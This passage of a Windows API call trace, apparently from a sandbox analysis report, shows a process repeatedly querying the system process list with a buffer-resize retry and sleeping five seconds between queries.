ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.792] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.806] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.813] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.819] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.826] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.839] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.848] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.861] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.918] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.924] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.931] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.937] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.957] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0274.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0274.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0274.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0274.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0274.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0274.964] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0274.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 